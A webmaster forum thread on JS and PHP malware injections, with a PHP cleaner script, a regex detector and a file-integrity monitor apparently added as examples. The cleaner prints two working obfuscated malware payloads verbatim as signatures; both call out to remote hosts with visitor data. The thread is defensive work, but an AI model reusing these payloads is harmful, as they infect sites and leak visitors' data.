Better check your JS and PHP files [new malware injects]

  • SZNY
    SZNY
    • May 2004
    • 2800

    #1

    Better check your JS and PHP files [new malware injects]

    Just wanted to share this with you as it might affect your traffic. Funny thing is that Google doesn't report it yet as badware.

    There is a new kind of JS malware virus that injects code to make 1pixel iframes and connects to certain sites.

    I just scanned 150 domains and some of my WP installs were infected.

    Here is a link from a German coder offering a workable solution. Copy the code in a php file and upload it to the root of your server.

    Once done type www.xxxx.xx/filename.php to start scanning your files.

    It also disinfects your code. Here are the links:
    http://forum.nexoneu.com/NXEU.aspx?g=posts&m=3143118
    http://blog.insidecomp.com/?p=33#more-33


    PHP Code:
    <!DOCTYPE html>
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>INSIDE Computer MalwareCheck 0.1</title>
    </head>
    <body>
    <h1>Javascript und PHP Files werden auf Befall gecheckt:</h1>

    <?php
    echo '<h2>Startverzeichnis:'.getcwd().'</h2><br/>';
    // dir_walk('/hp/ac/ab/vt/www/spd2011', 'showFiles');
    $files_checked = 0;
    $files_infected = 0;
    echo '<table>';
    dir_walk(getcwd(), 'checkFiles');
    echo '</table>';

    echo '<h2>Files checked: '.$files_checked.'<br/></h2>';
    echo '<h2>Files infected: '.$files_infected.'<br/></h2>';
    if ($files_infected == 0) {
        echo 'Alles im gr&uuml;nen Bereich...';
    }

    // Recursively walk $start_dir and call $func on every regular file found.
    function dir_walk($start_dir, $func) {
        $entries = scandir($start_dir);
        foreach ($entries as $entry) {
            if ($entry == '.' || $entry == '..') {
                continue; /* skip these */
            } else if (is_dir($start_dir . '/' . $entry)) {
                echo '<tr><td><b>Scanning...'.$start_dir . '/' . $entry.'</b></td></tr>';
                dir_walk($start_dir . '/' . $entry, $func);
            } else {
                $func($start_dir . '/' . $entry);
            }
        }
    }

    // Check one file: only .js and .php files are scanned, each against its own signature.
    function checkFiles($filename) {
        // disinfect JavaScript files (test the suffix, not the first '.js' anywhere in the path)
        if (substr($filename, -3) === '.js') {
            echo '<tr><td>.js-File checking: '.$filename.'</td>';
            // injected signature, kept verbatim on the following line
    $pattern='var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;';
            disinfect($filename, $pattern);
        }
        // disinfect PHP files
        if (substr($filename, -4) === '.php') {
            echo '<tr><td>.php-File checking: '.$filename.'</td>';
            // injected signature, kept verbatim on the following line
    $pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
            disinfect($filename, $pattern);
        }
    }

    // Undo the htmlspecialchars() encoding used while matching, so the line is written back as plain text.
    // '&amp;' is decoded last: decoding it first would turn a literal '&lt;' in the source into '<'.
    function restore_hsc($val) {
        $val = str_replace('&ouml;', 'ö', $val);
        $val = str_replace('&auml;', 'ä', $val);
        $val = str_replace('&uuml;', 'ü', $val);
        $val = str_replace('&lt;', '<', $val);
        $val = str_replace('&gt;', '>', $val);
        $val = str_replace('&quot;', '"', $val);
        $val = str_replace('&amp;', '&', $val);
        return $val;
    }

    // Scan $filename line by line for $pattern; infected lines are rewritten with the pattern removed.
    function disinfect($filename, $pattern) {
        global $files_checked, $files_infected;
        $files_checked++;
        $pattern = trim(htmlspecialchars($pattern)); // prepare pattern
        $lines = file($filename);
        $found = 0;
        for ($i = 0; $i < sizeof($lines); $i++) {
            $current_line = trim(htmlspecialchars($lines[$i]));
            if (strstr($current_line, $pattern)) {
                $lines[$i] = str_replace($pattern, "", htmlspecialchars(trim($lines[$i])));
                $lines[$i] = preg_replace('/\s\s+/', ' ', $lines[$i]);
                $lines[$i] = restore_hsc($lines[$i]);
                $found++;
            }
        }
        $lines = array_values($lines);
        if ($found > 0) {
            $files_infected++;
            $file = fopen($filename, "w");
            fwrite($file, implode("\n", $lines));
            fclose($file); // fwrite() already updates the mtime; no touch() on the closed handle
            echo " <td><span style=\"color:red;\"> is infected. Cured: $found injected objects</span></td></tr>";
        } else {
            echo " <td><span style=\"color:green;\"> - File is clean</span></td></tr>";
        }
    }
    ?>
    </body>
    </html>
    Telegram: sandroanthonio
  • nico-t
    emperor of my world
    • Aug 2004
    • 29903

    #2
    how will this virus affect your server? Will this cause load issues and eventually a mysql crash?


    • SZNY
      SZNY
      • May 2004
      • 2800

      #3
      Well, it will cause extra load on your server (makes more connections), plus your sites are flagged as malware by various AV software apps.


      • pornguy
        Too lazy to set a custom title
        • Mar 2003
        • 62912

        #4
        Is this hitting blogs, or sites in general?


        Can you find it by looking at the code of the index or is it hidden?
        PornGuy skype me pornguy_epic

        AmateurDough The Hottes Shemales online!
        TChicks.com | Angeles Cid | Mariana Cordoba | MAILERS WELCOME!


        • SZNY
          SZNY
          • May 2004
          • 2800

          #5
          Doesn't matter, all sites that are using JS files


          • pornguy
            Too lazy to set a custom title
            • Mar 2003
            • 62912

            #6
            OK thanks

            Damn.. More work.


            • raymor
              Confirmed User
              • Oct 2002
              • 3745

              #7
              Thanks, I'll add that signature to our scanner. I'll actually be interpreting and reducing the signature to catch other variations of the same thing. The posted code is awfully specific.
              For historical display only. This information is not current:
              support@bettercgi.com ICQ 7208627
              Strongbox - The next generation in site security
              Throttlebox - The next generation in bandwidth control
              Clonebox - Backup and disaster recovery on steroids
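
              A report-only scanner in the spirit of raymor's remark, added here as an example (it is not the thread's script and not bettercgi's scanner): instead of the exact strings from post #1 it matches the shapes they share (a hex-escaped `_0x...` string table, the `$_F=__FILE__;$_X=` / `eval(base64_decode(` loader, 1-pixel or invisible iframes), so variations still get flagged. The indicator list, the function names and the sample inputs are this example's own constructions.

              ```python
              import re
              import sys
              from pathlib import Path

              # Indicators generalised from the two signatures in post #1. They are heuristics:
              # files are reported for review, never rewritten (unlike the posted cleaner).
              INDICATORS = [
                  # JS: hex-escaped string table such as var _0xdc8d=["\x73\x63",...] hiding DOM calls
                  ("js_hex_string_table",
                   re.compile(r'var\s+_0x[0-9a-f]+\s*=\s*\[\s*"(?:\\x[0-9a-fA-F]{2}){4,}')),
                  # JS: lookups through that table, e.g. document[_0xdc8d[1]](_0xdc8d[0])
                  ("js_obfuscated_member_access", re.compile(r'\w+\[_0x[0-9a-f]+\[\d+\]\]')),
                  # PHP: the $_F=__FILE__;$_X='...' loader that the .php signature starts with
                  ("php_file_x_loader", re.compile(r'\$_F\s*=\s*__FILE__\s*;\s*\$_X\s*=')),
                  # PHP: eval over a base64 blob, optionally gz-wrapped (a common variation)
                  ("php_eval_base64",
                   re.compile(r'eval\s*\(\s*(?:gz(?:inflate|uncompress)\s*\(\s*)?base64_decode\s*\(')),
                  # HTML: 1-pixel or invisible iframes, the injection described in the opening post
                  ("hidden_iframe", re.compile(
                      r'<iframe[^>]*(?:width\s*=\s*["\']?[01]\b|height\s*=\s*["\']?[01]\b'
                      r'|display\s*:\s*none|visibility\s*:\s*hidden)', re.I)),
              ]

              def scan_text(text):
                  """Return the names of all indicators that fire on one file's content."""
                  return [name for name, rx in INDICATORS if rx.search(text)]

              def scan_tree(root, exts=(".js", ".php", ".html", ".htm")):
                  """Walk root and map each suspicious file path to the indicators it triggered."""
                  hits = {}
                  for path in Path(root).rglob("*"):
                      if path.is_file() and path.suffix.lower() in exts:
                          try:
                              found = scan_text(path.read_text(errors="replace"))
                          except OSError:
                              continue
                          if found:
                              hits[str(path)] = found
                  return hits

              # Constructed samples shaped like the thread's signatures but with harmless contents.
              SAMPLE_JS = 'var _0xab12=["\\x61\\x62\\x63\\x64","\\x65"];x=document[_0xab12[1]](_0xab12[0]);'
              SAMPLE_PHP = "<?php $_F=__FILE__;$_X='Pz4='; eval(base64_decode('Pz4=')); ?>"
              SAMPLE_HTML = '<p>hi</p><iframe src="http://example.invalid/" width="1" height="1"></iframe>'
              CLEAN_JS = "function add(a, b) { return a + b; }"

              if __name__ == "__main__":
                  for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
                      print(f"{path}: {', '.join(found)}")
              ```

              Minified libraries with `\x` escapes can trip the first indicator, so treat hits as a review queue and diff the file against a known-good copy before cleaning.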


              • pimpware
                Confirmed User
                • Jan 2006
                • 1673

                #8
                Thanks for the heads up

                All check and clean
                icq: 284494832
                realsexforyou.com


                • blackmonsters
                  Making PHP work
                  • Nov 2002
                  • 20964

                  #9
                  Cleaning up your files is good but that doesn't fix the problem.

                  How did that get into your site to begin with is the question.
                  Free Open Source Live Aggregated Cams Script (FOSLACS)


                  • SZNY
                    SZNY
                    • May 2004
                    • 2800

                    #10
                    Originally posted by blackmonsters
                    Cleaning up your files is good but that doesn't fix the problem.

                    How did that get into your site to begin with is the question.
                    In my case I had some test domains which were not that secured and infected the rest of the server.

                    All is pretty closed now. Took me some time but all is cleaned and hope it can help others.


                    • V_RocKs
                      Damn Right I Kiss Ass!
                      • Nov 2003
                      • 32449

                      #11
                      crazy h4x0r5


                      • Darkhorse
                        Horsing Around
                        • Sep 2002
                        • 5879

                        #12
                        Thanks for this, will have to check mine out.


                        • harvey
                          Confirmed User
                          • Jul 2001
                          • 9266

                          #13
                          the cleaning code itself makes my antivirus go bananas
                          This post is endorsed by CIA, KGB, MI6, the Mafia, Illuminati, Kim Jong Il, Worldwide Ninjas Association, Klingon Empire and lolcats. Don't mess around with it, just accept it and embrace the truth


                          • FlorianPC
                            Registered User
                            • Mar 2011
                            • 20

                            #14
                            thanks for the code, i will check my domains too.


                            Saboom.com - interactive porn monetization solution for a free porn internet


                            • gabe100
                              Confirmed User
                              • Dec 2002
                              • 459

                              #15
                              If you don't think you're vulnerable read about my nightmare below. It's quite embarrassing. I don't post much. No one wants to write a story like this, hopefully it helps someone.

                              I was hit Thanksgiving day of last year. 12 years running adult sites and never a problem. In my case, the permissions on 1 php file within openx were wide open. Permissions don't sync across servers and malware was injected on my splash redirecting to a Russian site. Multiple shells were installed and if you have ever seen your backend/library via a shell with Russian headers and tags, it's the scariest thing ever.

                              Quite elegant too, all your folders and files are color coded, everything wide open.

                              The second scariest thing is looking at the code injected on to the page itself. In my case the code was 7 or 8 strange characters, you can't even see the redirect buried at the very bottom of the page. The page is straight HTML, a simple warning page. Super clean. The characters look like the innocent copyright tags.

                              That code referenced scripts buried far in my file structure.

                              Ad Words suspended, Banned from Google. Cybercat pulling me, TJ yanked me. Kenny emailing me, Paperstreet emailing me. Pornhub video b gone. Exo paused. NIGHTMARE!

                              That was my Thanksgiving.

                              The good part is it didn't last long. Once clean I resubmitted to google and within 5 seconds I was approved and it was like nothing ever happened. All references to us distributing malware within google search vanished.

                              What saved us was clonebox and Ray, having a great host and my man Konrad. The very early symptoms won't be apparent. First extremely vague warnings from Avast, then AVG then it gets wide out and the messages start rolling in from customers and partners. The nightmare really starts once you get banned from google. All paid SEO Gone, all organic SEO replaced with malware warnings.

                              Multiple servers on lockdown, thousands of folders each with perfect permissions set and yet 1 file wide open.

                              Looking back it's probably best it happened because other measures are now in place to ensure that never happens again.

                              Check your permissions and at the very least, get a script installed that alerts you to any changes on your boxes. Having a firewall on your FTP/SSH isn't enough. These new malware injections are pretty clever.

                              Rather embarrassing, I had to learn the hard way. Hopefully you won't have to.
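
                              One way to do the change-alerting gabe100 recommends, added here as an example (it is not clonebox or any other tool named in the thread): it records a SHA-256 and the permission bits of every .php/.js/.html file under a web root, then reports added, removed, modified and world-writable files against a saved baseline. The file name `fim.py`, the JSON layout and the watched suffixes are this example's own choices.

                              ```python
                              import hashlib
                              import json
                              import os
                              import stat
                              import sys
                              from pathlib import Path

                              # Files worth watching under a web root; post #15's entry point was a single .php file.
                              WATCH_SUFFIXES = {".php", ".js", ".html", ".htm"}

                              def file_record(path):
                                  """SHA-256 of the content plus the permission bits, since a wide-open file was the way in."""
                                  h = hashlib.sha256()
                                  with open(path, "rb") as f:
                                      for chunk in iter(lambda: f.read(65536), b""):
                                          h.update(chunk)
                                  mode = stat.S_IMODE(os.stat(path).st_mode)
                                  return {"sha256": h.hexdigest(), "mode": f"{mode:04o}"}

                              def build_baseline(root):
                                  """Map each watched file (path relative to root) to its record."""
                                  root = Path(root)
                                  return {str(p.relative_to(root)): file_record(p)
                                          for p in root.rglob("*")
                                          if p.is_file() and p.suffix.lower() in WATCH_SUFFIXES}

                              def compare(baseline, current):
                                  """Diff two baselines; world_writable lists files anyone on the box may modify right now."""
                                  report = {"added": [], "removed": [], "modified": [], "world_writable": []}
                                  for name in sorted(set(baseline) | set(current)):
                                      if name not in baseline:
                                          report["added"].append(name)
                                      elif name not in current:
                                          report["removed"].append(name)
                                      elif baseline[name] != current[name]:
                                          report["modified"].append(name)
                                      if name in current and int(current[name]["mode"], 8) & stat.S_IWOTH:
                                          report["world_writable"].append(name)
                                  return report

                              if __name__ == "__main__":
                                  # usage: fim.py baseline ROOT > baseline.json   or   fim.py check ROOT baseline.json
                                  cmd, root = sys.argv[1], sys.argv[2]
                                  if cmd == "baseline":
                                      print(json.dumps(build_baseline(root), indent=1))
                                  else:
                                      with open(sys.argv[3]) as f:
                                          saved = json.load(f)
                                      print(json.dumps(compare(saved, build_baseline(root)), indent=1))
                              ```

                              Keep the script and baseline.json outside the web root (or on another host) and run the check from cron, since a shell on the box can edit both.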
